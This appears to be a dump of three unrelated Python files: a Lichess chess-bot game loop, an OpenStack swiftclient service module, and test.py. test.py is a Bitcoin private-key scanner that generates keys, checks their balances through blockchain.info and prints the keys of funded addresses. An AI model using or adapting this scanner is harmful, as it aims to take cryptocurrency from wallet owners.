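# network-level errors keep being retried until max_time is reached.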
def upgrade_account(li):
if li.upgrade_to_bot_account() is None:
return False
logger.info("Succesfully upgraded to Bot Account!")
return True
def watch_control_stream(control_queue, li):
while not terminated:
try:
response = li.get_event_stream()
lines = response.iter_lines()
for line in lines:
if line:
event = json.loads(line.decode("utf-8"))
control_queue.put_nowait(event)
else:
control_queue.put_nowait({"type": "ping"})
except:
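            # The event stream can drop (timeouts, server restarts); swallow the
            # error and let the surrounding while-loop reconnect.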
pass
def start(li, user_profile, engine_factory, config):
challenge_config = config["challenge"]
max_games = challenge_config.get("concurrency", 1)
logger.info("You're now connected to {} and awaiting challenges.".format(config["url"]))
manager = multiprocessing.Manager()
challenge_queue = manager.list()
control_queue = manager.Queue()
control_stream = multiprocessing.Process(target=watch_control_stream, args=[control_queue, li])
control_stream.start()
busy_processes = 0
queued_processes = 0
with logging_pool.LoggingPool(max_games + 1) as pool:
while not terminated:
event = control_queue.get()
if event["type"] == "terminated":
break
elif event["type"] == "local_game_done":
busy_processes -= 1
logger.info(
"+++ Process Free. Total Queued: {}. Total Used: {}".format(
queued_processes, busy_processes
)
)
elif event["type"] == "challenge":
chlng = model.Challenge(event["challenge"])
if chlng.is_supported(challenge_config):
challenge_queue.append(chlng)
if challenge_config.get("sort_by", "best") == "best":
list_c = list(challenge_queue)
list_c.sort(key=lambda c: -c.score())
challenge_queue = list_c
else:
try:
li.decline_challenge(chlng.id)
logger.info(" Decline {}".format(chlng))
except Exception:
# The challenge may already have been cancelled or withdrawn; ignore the failure.
pass
elif event["type"] == "gameStart":
if queued_processes <= 0:
logger.debug(
"Something went wrong. Game is starting and we don't have a queued process"
)
else:
queued_processes -= 1
busy_processes += 1
logger.info(
"--- Process Used. Total Queued: {}. Total Used: {}".format(
queued_processes, busy_processes
)
)
game_id = event["game"]["id"]
pool.apply_async(
play_game,
[
li,
game_id,
control_queue,
engine_factory,
user_profile,
config,
challenge_queue,
],
)
while (
queued_processes + busy_processes
) < max_games and challenge_queue: # keep processing the queue until empty or max_games is reached
chlng = challenge_queue.pop(0)
try:
logger.info(" Accept {}".format(chlng))
queued_processes += 1
response = li.accept_challenge(chlng.id)
logger.info(
"--- Process Queue. Total Queued: {}. Total Used: {}".format(
queued_processes, busy_processes
)
)
except (HTTPError, ReadTimeout) as exception:
if (
isinstance(exception, HTTPError) and exception.response.status_code == 404
): # ignore missing challenge
logger.info(" Skip missing {}".format(chlng))
queued_processes -= 1
logger.info("Terminated")
control_stream.terminate()
control_stream.join()
ponder_results = {}
@backoff.on_exception(backoff.expo, BaseException, max_time=600, giveup=is_final)
def play_game(li, game_id, control_queue, engine_factory, user_profile, config, challenge_queue):
response = li.get_game_stream(game_id)
lines = response.iter_lines()
# Initial response of stream will be the full game info. Store it
initial_state = json.loads(next(lines).decode("utf-8"))
game = model.Game(
initial_state,
user_profile["username"],
li.baseUrl,
config.get("abort_time", 20),
)
board = setup_board(game)
engine = engine_factory(board)
conversation = Conversation(game, engine, li, __version__, challenge_queue)
logger.info("+++ {}".format(game))
engine_cfg = config["engine"]
is_uci = engine_cfg["protocol"] == "uci"
is_uci_ponder = is_uci and engine_cfg.get("uci_ponder", False)
move_overhead = config.get("move_overhead", 1000)
polyglot_cfg = engine_cfg.get("polyglot", {})
book_cfg = polyglot_cfg.get("book", {})
ponder_thread = None
deferredFirstMove = False
ponder_uci = None
def ponder_thread_func(game, engine, board, wtime, btime, winc, binc):
global ponder_results
best_move, ponder_move = engine.search_with_ponder(board, wtime, btime, winc, binc, True)
ponder_results[game.id] = (best_move, ponder_move)
engine.set_time_control(game)
if len(board.move_stack) < 2:
while not terminated:
try:
if not polyglot_cfg.get("enabled") or not play_first_book_move(
game, engine, board, li, book_cfg
):
if not play_first_move(game, engine, board, li):
deferredFirstMove = True
break
except HTTPError as exception:
if exception.response.status_code == 400: # fallthrough
break
else:
moves = game.state["moves"].split()
if not board.is_game_over() and is_engine_move(game, moves):
book_move = None
best_move = None
ponder_move = None
wtime = game.state["wtime"]
btime = game.state["btime"]
if board.turn == chess.WHITE:
wtime = max(0, wtime - move_overhead)
else:
btime = max(0, btime - move_overhead)
if (
polyglot_cfg.get("enabled")
and len(moves) <= polyglot_cfg.get("max_depth", 8) * 2 - 1
):
book_move = get_book_move(board, book_cfg)
if book_move is None:
logger.info("Searching for wtime {} btime {}".format(wtime, btime))
best_move, ponder_move = engine.search_with_ponder(
board, wtime, btime, game.state["winc"], game.state["binc"]
)
engine.print_stats()
else:
best_move = book_move
if is_uci_ponder and ponder_move is not None:
ponder_board = board.copy()
ponder_board.push(best_move)
ponder_board.push(ponder_move)
ponder_uci = ponder_move.uci()
logger.info("Pondering for wtime {} btime {}".format(wtime, btime))
ponder_thread = threading.Thread(
target=ponder_thread_func,
args=(
game,
engine,
ponder_board,
wtime,
btime,
game.state["winc"],
game.state["binc"],
),
)
ponder_thread.start()
li.make_move(game.id, best_move)
while not terminated:
try:
binary_chunk = next(lines)
except StopIteration:
break
try:
upd = json.loads(binary_chunk.decode("utf-8")) if binary_chunk else None
u_type = upd["type"] if upd else "ping"
if u_type == "chatLine":
conversation.react(ChatLine(upd), game)
elif u_type == "gameState":
game.state = upd
moves = upd["moves"].split()
board = update_board(board, moves[-1])
if not board.is_game_over() and is_engine_move(game, moves):
if config.get("fake_think_time") and len(moves) > 9:
delay = min(game.clock_initial, game.my_remaining_seconds()) * 0.015
accel = 1 - max(0, min(100, len(moves) - 20)) / 150
sleep = min(5, delay * accel)
time.sleep(sleep)
book_move = None
best_move = None
ponder_move = None
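# Ponder bookkeeping: if the opponent played exactly the move we were pondering
# on, signal ponderhit and reuse that search result; otherwise stop the
# speculative search and fall through to a fresh search below.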
if ponder_thread is not None:
move_uci = moves[-1]
if ponder_uci == move_uci:
engine.engine.ponderhit()
ponder_thread.join()
ponder_thread = None
best_move, ponder_move = ponder_results[game.id]
engine.print_stats()
else:
engine.engine.stop()
ponder_thread.join()
ponder_thread = None
ponder_uci = None
wtime = upd["wtime"]
btime = upd["btime"]
if board.turn == chess.WHITE:
wtime = max(0, wtime - move_overhead)
else:
btime = max(0, btime - move_overhead)
if not deferredFirstMove:
if (
polyglot_cfg.get("enabled")
and len(moves) <= polyglot_cfg.get("max_depth", 8) * 2 - 1
):
book_move = get_book_move(board, book_cfg)
if best_move is None:
if book_move is None:
logger.info("Searching for wtime {} btime {}".format(wtime, btime))
best_move, ponder_move = engine.search_with_ponder(
board, wtime, btime, upd["winc"], upd["binc"]
)
engine.print_stats()
else:
best_move = book_move
else:
if book_move is not None:
best_move = book_move
ponder_move = None
if is_uci_ponder and ponder_move is not None:
ponder_board = board.copy()
ponder_board.push(best_move)
ponder_board.push(ponder_move)
ponder_uci = ponder_move.uci()
logger.info("Pondering for wtime {} btime {}".format(wtime, btime))
ponder_thread = threading.Thread(
target=ponder_thread_func,
args=(
game,
engine,
ponder_board,
wtime,
btime,
upd["winc"],
upd["binc"],
),
)
ponder_thread.start()
li.make_move(game.id, best_move)
else:
if not polyglot_cfg.get("enabled") or not play_first_book_move(
game, engine, board, li, book_cfg
):
play_first_move(game, engine, board, li)
deferredFirstMove = False
if board.turn == chess.WHITE:
game.ping(
config.get("abort_time", 20),
(upd["wtime"] + upd["winc"]) / 1000 + 60,
)
else:
game.ping(
config.get("abort_time", 20),
(upd["btime"] + upd["binc"]) / 1000 + 60,
)
elif u_type == "ping":
if game.should_abort_now():
logger.info(" Aborting {} by lack of activity".format(game.url()))
li.abort(game.id)
break
elif game.should_terminate_now():
logger.info(" Terminating {} by lack of activity".format(game.url()))
if game.is_abortable():
li.abort(game.id)
break
except (
HTTPError,
ReadTimeout,
RemoteDisconnected,
ChunkedEncodingError,
ConnectionError,
ProtocolError,
) as e:
ongoing_games = li.get_ongoing_games()
game_over = True
for ongoing_game in ongoing_games:
if ongoing_game["gameId"] == game.id:
game_over = False
break
if not game_over:
continue
else:
break
logger.info("--- {} Game over".format(game.url()))
engine.engine.stop()
engine.quit()
if ponder_thread is not None:
ponder_thread.join()
ponder_thread = None
# This can raise queue.Full, but that should only happen if we're not processing
# events fast enough and in this case I believe the exception should be raised
control_queue.put_nowait({"type": "local_game_done"})
def play_first_move(game, engine, board, li):
moves = game.state["moves"].split()
if is_engine_move(game, moves):
# need to hardcode first movetime since Lichess has 30 sec limit.
best_move = engine.first_search(board, 10000)
engine.print_stats()
li.make_move(game.id, best_move)
return True
return False
def play_first_book_move(game, engine, board, li, config):
moves = game.state["moves"].split()
if is_engine_move(game, moves):
book_move = get_book_move(board, config)
if book_move:
li.make_move(game.id, book_move)
return True
else:
return play_first_move(game, engine, board, li)
return False
def get_book_move(board, config):
if board.uci_variant == "chess":
book = config["standard"]
else:
if config.get("{}".format(board.uci_variant)):
book = config["{}".format(board.uci_variant)]
else:
return None
with chess.polyglot.open_reader(book) as reader:
try:
selection = config.get("selection", "weighted_random")
move = None  # stays None if an unknown selection mode is configured
if selection == "weighted_random":
move = reader.weighted_choice(board).move()
elif selection == "uniform_random":
move = reader.choice(board, minimum_weight=config.get("min_weight", 1)).move()
elif selection == "best_move":
move = reader.find(board, minimum_weight=config.get("min_weight", 1)).move()
except IndexError:
# python-chess raises "IndexError" if no entries found
move = None
if move is not None:
logger.info("Got move {} from book {}".format(move, book))
return move
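# Illustrative shape of the book config consumed above (file paths are
# placeholders, not part of this repository):
#   book_cfg = {
#       "standard": "engines/book.bin",       # book used for standard chess
#       "crazyhouse": "engines/zh-book.bin",  # optional per-variant books
#       "selection": "weighted_random",       # or "uniform_random" / "best_move"
#       "min_weight": 1,
#   }
#   move = get_book_move(board, book_cfg)     # chess.Move or None if no entry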
def setup_board(game):
if game.variant_name.lower() == "chess960":
board = chess.Board(game.initial_fen, chess960=True)
elif game.variant_name == "From Position":
board = chess.Board(game.initial_fen)
else:
VariantBoard = find_variant(game.variant_name)
board = VariantBoard()
moves = game.state["moves"].split()
for move in moves:
board = update_board(board, move)
return board
def is_white_to_move(game, moves):
return len(moves) % 2 == (0 if game.white_starts else 1)
def is_engine_move(game, moves):
return game.is_white == is_white_to_move(game, moves)
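# Worked example of the parity check: with game.white_starts True and no moves
# played, len(moves) % 2 == 0, so is_white_to_move() is True; after one move it
# flips. is_engine_move() then compares that side with game.is_white to decide
# whether it is the bot's turn to search.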
def update_board(board, move):
uci_move = chess.Move.from_uci(move)
board.push(uci_move)
return board
def intro():
return (
r"""
. _/|
. // o\
. || ._) lichess-bot %s
. //__\
. )___( Play on Lichess with a bot
"""
% __version__
)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Play on Lichess with a bot")
parser.add_argument(
"-u",
action="store_true",
help="Add this flag to upgrade your account to a bot account.",
)
parser.add_argument(
"-v",
action="store_true",
help="Verbose output. Changes log level from INFO to DEBUG.",
)
parser.add_argument("--config", help="Specify a configuration file (defaults to ./config.yml)")
parser.add_argument("-l", "--logfile", help="Log file to append logs to.", default=None)
args = parser.parse_args()
logging.basicConfig(
level=logging.DEBUG if args.v else logging.INFO,
filename=args.logfile,
format="%(asctime)-15s: %(message)s",
)
enable_color_logging(debug_lvl=logging.DEBUG if args.v else logging.INFO)
logger.info(intro())
CONFIG = load_config(args.config or "./config.yml")
li = lichess.Lichess(CONFIG["token"], CONFIG["url"], __version__)
user_profile = li.get_profile()
username = user_profile["username"]
is_bot = user_profile.get("title") == "BOT"
logger.info("Welcome {}!".format(username))
if args.u is True and is_bot is False:
is_bot = upgrade_account(li)
if is_bot:
engine_factory = partial(engine_wrapper.create_engine, CONFIG)
start(li, user_profile, engine_factory, CONFIG)
else:
logger.error(
"{} is not a bot account. Please upgrade it to a bot account!".format(
user_profile["username"]
)
)
|
test.py
|
import threading
import os
import time
import wallet_random
import requests
import json
from bit import Key
from bit.format import bytes_to_wif
import traceback
maxPage = pow(2, 256) // 128  # integer division: '/' would collapse 2**256 into an imprecise float
#maxPage = 904625697166532776746648320380374280100293470930272690489102837043110636675
def getRandPage():
return wallet_random.randint(1, maxPage)
def getPage(pageNum):
keyList = []
addrList = []
addrStr1 = ""
addrStr2 = ""
num = (pageNum - 1) * 128 + 1
try:
for i in range(num, num + 128):
key1 = Key.from_int(i)
wif = bytes_to_wif(key1.to_bytes(), compressed=False)
key2 = Key(wif)
keyList.append(hex(i)[2:])
addrList.append(key2.address)
addrList.append(key1.address)
if len(addrStr1): addrStr1 = addrStr1 + "|"
addrStr1 = addrStr1 + key2.address
if len(addrStr2): addrStr2 = addrStr2 + "|"
addrStr2 = addrStr2 + key1.address
except:
pass
return [keyList, addrList, addrStr1, addrStr2]
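# Page arithmetic: page N covers the 128 consecutive private keys
# (N - 1) * 128 + 1 .. N * 128 (page 1 -> keys 1..128, page 2 -> 129..256).
# Each key contributes two addresses (key2 rebuilt from an uncompressed WIF,
# key1 with the library default), so addrList holds 256 entries per page and
# addrStr1/addrStr2 are the pipe-joined batches passed to getBalances().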
'''
def getPage(pageNum):
try:
r = requests.get(url='http://directory.io/%d' % pageNum, timeout=5)
r = r.content
except:
return []
keys = r.split("how-this-works!/")
addrs = r.split("blockchain.info/address/")
keyList = []
addrList = []
addrStr1 = ""
addrStr2 = ""
for i in range(1, len(keys)):
key = keys[i].split("\"")[0]
keyList.append(key)
for i in range(1, len(addrs)):
addr = addrs[i].split("\"")[0]
addrList.append(addr)
if i % 2 == 1:
if len(addrStr1): addrStr1 = addrStr1 + "|"
addrStr1 = addrStr1 + addr
else:
if len(addrStr2): addrStr2 = addrStr2 + "|"
addrStr2 = addrStr2 + addr
return [keyList, addrList, addrStr1, addrStr2]
'''
def getBalances(addrStr):
balances = "security"
while True:
if "security" not in balances: break
secAddr = balances.split("effects address ")
if len(secAddr) >= 2:
secAddr = secAddr[1].split(".")[0]
addrStr = addrStr.replace(secAddr + "|", "")
addrStr = addrStr.replace("|" + secAddr, "")
try:
r = requests.get(url='http://blockchain.info/multiaddr?active=%s' % addrStr, timeout=5)
balances = r.text
except:
return
try:
balances = json.loads(balances)
balances = balances['addresses']
except:
print (balances)
return balances
getCount = 0
#fp_found = open("found.txt", "w+")
#fp_fund = open("fund.txt", "w+")
def getWallet():
global getCount
while True:
page = getRandPage()
pageRet = getPage(page)  # use the randomly chosen page instead of always fetching page 1
try:
balancesRet = getBalances(pageRet[2])
for balance in balancesRet:
getCount = getCount + 1
if balance['final_balance'] <= 0 and balance['total_sent'] <= 0: continue
key = ""
isCompress = 0
for i in range(0, len(pageRet[1])):
if balance['address'] == pageRet[1][i]:
key = pageRet[0][int(i/2)]
if i % 2 == 1: isCompress = 1
break
if key == "": continue
#fp_found.write(str(isCompress) + " " + str(balance['final_balance']) + " " + str(balance['total_sent']) + " " + key + " " + balance['address'] + "\n")
#if balance['final_balance'] > 0:
#fp_fund.write(str(isCompress) + " " + str(balance['final_balance']) + " " + str(balance['total_sent']) + " " + key + " " + balance['address'] + "\n")
print (isCompress, balance['final_balance'], balance['total_sent'], key, balance['address'])
balancesRet = getBalances(pageRet[3])
for balance in balancesRet:
getCount = getCount + 1
if balance['final_balance'] <= 0 and balance['total_sent'] <= 0: continue
key = ""
isCompress = 1
for i in range(0, len(pageRet[1])):
if balance['address'] == pageRet[1][i]:
key = pageRet[0][int(i/2)]
if i % 2 == 1: isCompress = 1
break
if key == "": continue
#fp_found.write(str(isCompress) + " " + str(balance['final_balance']) + " " + str(balance['total_sent']) + " " + key + " " + balance['address'] + "\n")
#if balance['final_balance'] > 0:
#fp_fund.write(str(isCompress) + " " + str(balance['final_balance']) + " " + str(balance['total_sent']) + " " + key + " " + balance['address'] + "\n")
print (isCompress, balance['final_balance'], balance['total_sent'], key, balance['address'])
#fp_found.flush()
#fp_fund.flush()
except:
traceback.print_exc()
break
clearScreen()
print (getCount)
break
def clearScreen():
os.system('clear')
def main():
threads = []
for i in range(1):
threads.append(threading.Thread(target=getWallet,args=()))
for t in threads:
time.sleep(1.0)
t.start()
for t in threads:
t.join()
if __name__ == '__main__':
main()
|
service.py
|
# Copyright (c) 2010-2013 OpenStack, LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import unicode_literals
import logging
import glob
from twisted.internet import task
from twisted.internet import reactor
import swiftclient.scheduling
import os
import datetime, threading, time
from time import sleep
from swiftclient.shell import *
from collections import defaultdict
from concurrent.futures import as_completed, CancelledError, TimeoutError
from copy import deepcopy
from errno import EEXIST, ENOENT
from hashlib import md5
from os import environ, makedirs, stat, utime
from os.path import (
basename, dirname, getmtime, getsize, isdir, join, sep as os_path_sep
)
from posixpath import join as urljoin
from random import shuffle
from time import *
from threading import Thread
from six import StringIO, text_type
from queue import Queue
from queue import Empty as QueueEmpty
from six.moves.urllib.parse import quote
from six import Iterator, string_types
import json
import swiftclient
from swiftclient import Connection
from swiftclient.command_helpers import (
stat_account, stat_container, stat_object
)
from swiftclient.utils import (
config_true_value, ReadableToIterable, LengthWrapper, EMPTY_ETAG,
parse_api_response, report_traceback, n_groups
)
from swiftclient.exceptions import ClientException
from swiftclient.multithreading import MultiThreadingManager
logger = logging.getLogger("swiftclient.service")
avail_bw = 0  # shared bandwidth measurement updated in SwiftService.download (a bare 'global' at module scope has no effect)
class ThreadingExample(object):
""" Threading example class
The run() method will be started and it will run in the background
until the application exits.
"""
def __init__(self, interval=1):
""" Constructor
:type interval: int
:param interval: Check interval, in seconds
"""
self.interval = interval
thread = threading.Thread(target=self.run, args=())
thread.daemon = True # Daemonize thread
thread.start() # Start the execution
def run(self):
""" Method that runs forever """
while True:
print('Doing something important in the background', swiftclient.shell.sum_data)
sleep(self.interval)
class ResultsIterator(Iterator):
def __init__(self, futures):
self.futures = interruptable_as_completed(futures)
def __iter__(self):
return self
def __next__(self):
next_completed_future = next(self.futures)
return next_completed_future.result()
class SwiftError(Exception):
def __init__(self, value, container=None, obj=None,
segment=None, exc=None):
self.value = value
self.container = container
self.obj = obj
self.segment = segment
self.exception = exc
def __str__(self):
value = repr(self.value)
if self.container is not None:
value += " container:%s" % self.container
if self.obj is not None:
value += " object:%s" % self.obj
if self.segment is not None:
value += " segment:%s" % self.segment
return value
def process_options(options):
# tolerate sloppy auth_version
if options.get('auth_version') == '3.0':
options['auth_version'] = '3'
elif options.get('auth_version') == '2':
options['auth_version'] = '2.0'
if options.get('auth_version') not in ('2.0', '3') and not all(
options.get(key) for key in ('auth', 'user', 'key')):
# Use keystone auth if any of the new-style args are present
if any(options.get(k) for k in (
'os_user_domain_id',
'os_user_domain_name',
'os_project_domain_id',
'os_project_domain_name')):
# Use v3 if there's any reference to domains
options['auth_version'] = '3'
else:
options['auth_version'] = '2.0'
# Use new-style args if old ones not present
if not options['auth'] and options['os_auth_url']:
options['auth'] = options['os_auth_url']
if not options['user'] and options['os_username']:
options['user'] = options['os_username']
if not options['key'] and options['os_password']:
options['key'] = options['os_password']
# Specific OpenStack options
options['os_options'] = {
'user_id': options['os_user_id'],
'user_domain_id': options['os_user_domain_id'],
'user_domain_name': options['os_user_domain_name'],
'tenant_id': options['os_tenant_id'],
'tenant_name': options['os_tenant_name'],
'project_id': options['os_project_id'],
'project_name': options['os_project_name'],
'project_domain_id': options['os_project_domain_id'],
'project_domain_name': options['os_project_domain_name'],
'service_type': options['os_service_type'],
'endpoint_type': options['os_endpoint_type'],
'auth_token': options['os_auth_token'],
'object_storage_url': options['os_storage_url'],
'region_name': options['os_region_name'],
}
def _build_default_global_options():
return {
"snet": False,
"verbose": 1,
"debug": False,
"info": False,
"auth": environ.get('ST_AUTH'),
"auth_version": environ.get('ST_AUTH_VERSION', '1.0'),
"user": environ.get('ST_USER'),
"key": environ.get('ST_KEY'),
"retries": 5,
"os_username": environ.get('OS_USERNAME'),
"os_user_id": environ.get('OS_USER_ID'),
"os_user_domain_name": environ.get('OS_USER_DOMAIN_NAME'),
"os_user_domain_id": environ.get('OS_USER_DOMAIN_ID'),
"os_password": environ.get('OS_PASSWORD'),
"os_tenant_id": environ.get('OS_TENANT_ID'),
"os_tenant_name": environ.get('OS_TENANT_NAME'),
"os_project_name": environ.get('OS_PROJECT_NAME'),
"os_project_id": environ.get('OS_PROJECT_ID'),
"os_project_domain_name": environ.get('OS_PROJECT_DOMAIN_NAME'),
"os_project_domain_id": environ.get('OS_PROJECT_DOMAIN_ID'),
"os_auth_url": environ.get('OS_AUTH_URL'),
"os_auth_token": environ.get('OS_AUTH_TOKEN'),
"os_storage_url": environ.get('OS_STORAGE_URL'),
"os_region_name": environ.get('OS_REGION_NAME'),
"os_service_type": environ.get('OS_SERVICE_TYPE'),
"os_endpoint_type": environ.get('OS_ENDPOINT_TYPE'),
"os_cacert": environ.get('OS_CACERT'),
"os_cert": environ.get('OS_CERT'),
"os_key": environ.get('OS_KEY'),
"insecure": config_true_value(environ.get('SWIFTCLIENT_INSECURE')),
"ssl_compression": False,
'segment_threads': 10,
'object_dd_threads': 10,
'object_uu_threads': 10,
'container_threads': 10
}
_default_global_options = _build_default_global_options()
_default_local_options = {
'sync_to': None,
'sync_key': None,
'use_slo': False,
'segment_size': None,
'segment_container': None,
'leave_segments': False,
'changed': None,
'skip_identical': False,
'yes_all': False,
'read_acl': None,
'write_acl': None,
'out_file': None,
'out_directory': None,
'remove_prefix': False,
'no_download': False,
'long': False,
'totals': False,
'marker': '',
'header': [],
'meta': [],
'prefix': None,
'delimiter': None,
'fail_fast': False,
'human': False,
'dir_marker': False,
'checksum': True,
'shuffle': False,
'destination': None,
'fresh_metadata': False,
}
POLICY = 'X-Storage-Policy'
KNOWN_DIR_MARKERS = (
'application/directory', # Preferred
'text/directory', # Historically relevant
)
def get_from_queue(q, timeout=864000):
while True:
try:
item = q.get(timeout=timeout)
return item
except QueueEmpty:
# Do nothing here, we only have a timeout to allow interruption
pass
def get_future_result(f, timeout=86400):
while True:
try:
res = f.result(timeout=timeout)
return res
except TimeoutError:
# Do nothing here, we only have a timeout to allow interruption
pass
def interruptable_as_completed(fs, timeout=86400):
while True:
try:
for f in as_completed(fs, timeout=timeout):
fs.remove(f)
yield f
return
except TimeoutError:
# Do nothing here, we only have a timeout to allow interruption
pass
def get_conn(options):
"""
Return a connection building it from the options.
"""
return Connection(options['auth'],
options['user'],
options['key'],
options['retries'],
auth_version=options['auth_version'],
os_options=options['os_options'],
snet=options['snet'],
cacert=options['os_cacert'],
insecure=options['insecure'],
cert=options['os_cert'],
cert_key=options['os_key'],
ssl_compression=options['ssl_compression'])
def mkdirs(path):
try:
makedirs(path)
except OSError as err:
if err.errno != EEXIST:
raise
def split_headers(options, prefix=''):
"""
Splits 'Key: Value' strings and returns them as a dictionary.
:param options: An array of 'Key: Value' strings
:param prefix: String to prepend to all of the keys in the dictionary.
"""
headers = {}
for item in options:
split_item = item.split(':', 1)
if len(split_item) == 2:
headers[(prefix + split_item[0]).title()] = split_item[1].strip()
else:
raise SwiftError(
"Metadata parameter %s must contain a ':'.\n%s"
% (item, "Example: 'Color:Blue' or 'Size:Large'")
)
return headers
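# Example of the mapping performed by split_headers (illustrative values only):
#   split_headers(['Color:Blue', 'Size:Large'], 'X-Object-Meta-')
#   -> {'X-Object-Meta-Color': 'Blue', 'X-Object-Meta-Size': 'Large'}
# A string without a ':' raises SwiftError.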
class SwiftUploadObject(object):
"""
Class for specifying an object upload, allowing the object source, name and
options to be specified separately for each individual object.
"""
def __init__(self, source, object_name=None, options=None):
if isinstance(source, string_types):
self.object_name = object_name or source
elif source is None or hasattr(source, 'read'):
if not object_name or not isinstance(object_name, string_types):
raise SwiftError('Object names must be specified as '
'strings for uploads from None or file '
'like objects.')
self.object_name = object_name
else:
raise SwiftError('Unexpected source type for '
'SwiftUploadObject: {0}'.format(type(source)))
if not self.object_name:
raise SwiftError('Object names must not be empty strings')
self.object_name = self.object_name.lstrip('/')
self.options = options
self.source = source
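# Illustrative construction (paths and names are placeholders): the source may
# be a local path, a file-like object, or None for an empty object, optionally
# with a per-object options dict:
#   SwiftUploadObject('/tmp/report.csv', object_name='reports/report.csv',
#                     options={'meta': ['Source:nightly-job']})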
class SwiftPostObject(object):
"""
Class for specifying an object post, allowing the headers/metadata to be
specified separately for each individual object.
"""
def __init__(self, object_name, options=None):
if not (isinstance(object_name, string_types) and object_name):
raise SwiftError(
"Object names must be specified as non-empty strings"
)
self.object_name = object_name
self.options = options
class SwiftCopyObject(object):
"""
Class for specifying an object copy,
allowing the destination/headers/metadata/fresh_metadata to be specified
separately for each individual object.
destination and fresh_metadata should be set in options
"""
def __init__(self, object_name, options=None):
if not (isinstance(object_name, string_types) and object_name):
raise SwiftError(
"Object names must be specified as non-empty strings"
)
self.object_name = object_name
self.options = options
if self.options is None:
self.destination = None
self.fresh_metadata = False
else:
self.destination = self.options.get('destination')
self.fresh_metadata = self.options.get('fresh_metadata', False)
if self.destination is not None:
destination_components = self.destination.split('/')
if destination_components[0] or len(destination_components) < 2:
raise SwiftError("destination must be in format /cont[/obj]")
if not destination_components[-1]:
raise SwiftError("destination must not end in a slash")
if len(destination_components) == 2:
# only container set in destination
self.destination = "{0}/{1}".format(
self.destination, object_name
)
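# Destination semantics enforced above: options={'destination': '/other-container'}
# copies the object under its own name into 'other-container', while
# '/other-container/new-name' also renames it; values not starting with '/'
# or ending in '/' are rejected with SwiftError.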
class _SwiftReader(object):
"""
Class for downloading objects from swift and raising appropriate
errors on failures caused by either invalid md5sum or size of the
data read.
"""
global avail_bw
avail_bw = 0
def __init__(self, path, body, headers, checksum=True):
self._path = path
self._body = body
self._actual_read = 0
self._content_length = None
self._actual_md5 = None
self._expected_etag = headers.get('etag')
if ('x-object-manifest' not in headers
and 'x-static-large-object' not in headers and checksum):
self._actual_md5 = md5()
if 'content-length' in headers:
try:
self._content_length = int(headers.get('content-length'))
except ValueError:
raise SwiftError('content-length header must be an integer')
def __iter__(self):
for chunk in self._body:
if self._actual_md5:
self._actual_md5.update(chunk)
self._actual_read += len(chunk)
yield chunk
self._check_contents()
def _check_contents(self):
if self._actual_md5 and self._expected_etag:
etag = self._actual_md5.hexdigest()
if etag != self._expected_etag:
raise SwiftError('Error downloading {0}: md5sum != etag, '
'{1} != {2}'.format(
self._path, etag, self._expected_etag))
if (self._content_length is not None
and self._actual_read != self._content_length):
raise SwiftError('Error downloading {0}: read_length != '
'content_length, {1:d} != {2:d}'.format(
self._path, self._actual_read,
self._content_length))
def bytes_read(self):
return self._actual_read
class SwiftService(object):
"""
Service for performing swift operations
"""
def __init__(self, options=None):
if options is not None:
self._options = dict(
_default_global_options,
**dict(_default_local_options, **options)
)
else:
self._options = dict(
_default_global_options,
**_default_local_options
)
process_options(self._options)
create_connection = lambda: get_conn(self._options)
self.thread_manager = MultiThreadingManager(
create_connection,
segment_threads=self._options['segment_threads'],
object_dd_threads=self._options['object_dd_threads'],
object_uu_threads=self._options['object_uu_threads'],
container_threads=self._options['container_threads']
)
self.capabilities_cache = {} # Each instance should have its own cache
def __enter__(self):
self.thread_manager.__enter__()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.thread_manager.__exit__(exc_type, exc_val, exc_tb)
# Stat related methods
#
def stat(self, container=None, objects=None, options=None):
"""
Get account stats, container stats or information about a list of
objects in a container.
:param container: The container to query.
:param objects: A list of object paths about which to return
information (a list of strings).
:param options: A dictionary containing options to override the global
options specified during the service object creation.
These options are applied to all stat operations
performed by this call::
{
'human': False
}
:returns: Either a single dictionary containing stats about an account
or container, or an iterator for returning the results of the
stat operations on a list of objects.
:raises: SwiftError
"""
if options is not None:
options = dict(self._options, **options)
else:
options = self._options
if not container:
if objects:
raise SwiftError('Objects specified without container')
else:
res = {
'action': 'stat_account',
'success': True,
'container': container,
'object': None,
}
try:
stats_future = self.thread_manager.container_pool.submit(
stat_account, options
)
items, headers = get_future_result(stats_future)
res.update({
'items': items,
'headers': headers
})
return res
except ClientException as err:
if err.http_status != 404:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time
})
return res
raise SwiftError('Account not found', exc=err)
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time
})
return res
else:
if not objects:
res = {
'action': 'stat_container',
'container': container,
'object': None,
'success': True,
}
try:
stats_future = self.thread_manager.container_pool.submit(
stat_container, options, container
)
items, headers = get_future_result(stats_future)
res.update({
'items': items,
'headers': headers
})
return res
except ClientException as err:
if err.http_status != 404:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time
})
return res
raise SwiftError('Container %r not found' % container,
container=container, exc=err)
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time
})
return res
else:
stat_futures = []
for stat_o in objects:
stat_future = self.thread_manager.object_dd_pool.submit(
self._stat_object, container, stat_o, options
)
stat_futures.append(stat_future)
return ResultsIterator(stat_futures)
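# Sketch of typical stat() usage (container/object names are placeholders):
#   with SwiftService() as swift:
#       acct = swift.stat()                          # account headers/items
#       cont = swift.stat(container='images')        # single container stats
#       for res in swift.stat(container='images', objects=['a.png', 'b.png']):
#           print(res['object'], res['success'])     # per-object result dicts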
@staticmethod
def _stat_object(conn, container, obj, options):
res = {
'action': 'stat_object',
'object': obj,
'container': container,
'success': True,
}
try:
items, headers = stat_object(conn, options, container, obj)
res.update({
'items': items,
'headers': headers
})
return res
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
